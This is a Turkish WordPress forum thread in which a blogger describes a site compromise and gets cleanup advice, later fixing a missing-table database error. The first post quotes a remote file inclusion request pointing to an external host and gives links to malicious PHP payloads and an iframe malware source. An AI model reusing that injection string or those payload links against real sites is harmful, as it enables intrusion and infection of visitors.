WordPress Türkiye Forumları

WordPress Türkiye Forumları » Diğer Konular

Blogumda trojan

(5 mesaj(lar))
  • 10 ay önce teknove tarafından başlatıldı
  • teknove tarafından son cevap
  • Bu konu Çözülmemiş

Etiketler:

  1. teknove
    Üye

    Merhaba Arkadaşlar,

    Blogumda son zamanlarda bazı agresiflikler seziyordum. Bunun bir hacking atağı olduğunu farkedip hemen son sürüme yükselttim. Fakat bundan bir iki gün sonra bilgisayarıma blogumdan bir trojen bulaştı ve bütün gece onunla kapışmak zorunda kaldım. Bloguma giremiyordum, bilgisayarım yavaşlamıştı ve karşıma sürekli bir kaç hatunun olduğu web sitesi geliyordu birçok siteye girmeye çalıştığımda. Hatta blogumun bulunduğu hosting firmasının sitesinede giremiyordum.

    Trojen blogumdan bulaşıyordu ve bulaşmadan önce birşeyleri farketmiştim.

    Örneğin Cpanel'den şu tarz girişler yapılmaya çalışılıyordu (hemde farklı farklı yerlerden);
    http://teknove.com/phpbb-de-turkce-karakterli-link-problemi/viewtopic.php?p=http://uzzino1991.altervista.org/cartella/images.gif??

    "viewtopic.php?p="ye değer olarak gönderilen iki web sitesini inceledim. Karşıma bu PHP kodları çıktı;

    http://www.silsan.com.tr/1.txt
    http://www.silsan.com.tr/2.txt

    Bu kodları az buçuk anlıyordum ve belliki kötü amaçlara hizmet ediyorlar. Fakat WP'de ki bu açığı nasıl nerden kapatacağımı bilmiyorum.

    www.teknove.com dan bulaşan trojenlerin http://www.wp-stats-php.info/iframe/wp-stats.php adresinden geldiğini gördüm. Anti-Vir programı alarm verirken blogumda bu kısım açılmaya çalışılıyordu.

    Bütün kodları karıştırdım birşey bulamadım. Wp'nin yapısı hakkında iyi bilgim yok. Bu konuda yardımlarınızı rica ediyorum.

    10 ay önce #

  2. eylultoprak
    Editör

    Önce bilgisayarı temizleyin. Temiz bir bilgisayarda virüs bulaşmadan önce aldığınız bir yedeği sağlam bir yerde muhafa edin.. Bu yedekde en son nerde kaldıysanız sitenizden eksik olan yerleri not alın. Virüs bulaşmadan önceki yedeği kurun.. Eklenti güncellemeleri yapın.. Bu yedekde olmayan verileri yükleyin..

    Nod32 kullanın :)

    Güncellemelere yarım saat vakit ayırmazsanız böyle uğraşır canınız sıkılır :)

    10 ay önce #

  3. teknove
    Üye

    İlginiz için teşekkür ettim. Bilgisayarım 4-5 gündür internete kapalı ve bu sitemdeki trojenle olan yoğun çatışmalarımdan ötürü meydana geldi :(

    Bunun öncesinde problemi çözdüm. Teknove'nin kaynak kodlarında virüslü iframe'i bulup DB'den ilgili yazıyı kaldırdım. Daha sonra hiçbir problem kalmadı.

    Derken karşıma kurulumdan kaynaklanan bir hata çıktı. Yazı, yorum eklendiğinde bu hata ile karşılaşıyorum;


    WordPress veritabanı hatası: [Table 'teknove_wordpress.wp_post2cat' doesn't exist]
    SELECT cat_ID AS ID, MAX(post_modified) AS last_mod
    FROM wp_posts p LEFT JOIN wp_post2cat pc ON p.ID = pc.post_id
    LEFT JOIN wp_categories c ON pc.category_id = c.cat_ID
    WHERE post_status = 'publish' GROUP BY cat_ID

    Warning: Cannot modify header information - headers already sent by
    (output started at /home/teknove/public_html/wp-includes/wp-db.php:160)
    in /home/teknove/public_html/wp-includes/pluggable.php on line 391

    Bu hata nerden çıktı şimdi :(

    10 ay önce #

  4. eylultoprak
    Editör

    Etiket sistemi büyük ihtimalle.. Forumda daha önce cevapladım belki 2.3.1 uyumsuz bir eklenti. Eklentileride güncel tutun

    10 ay önce #

  5. teknove
    Üye

    Bunuda hallettim Allaha şükür. İlginize teşekkür ederim tekrar.

    wp_post2cat adlı tabloyu bulamayınca manuel olarak kurdum. Ardından wp_categories gibi bir tablo istedi bunuda eski DB'den manuel olarak kurdum.

    Hoşça kalın...

    10 ay önce #

Bu konu için RSS beslemesi

Cevapla

Mesaj göndermek için giriş yapmalısınız.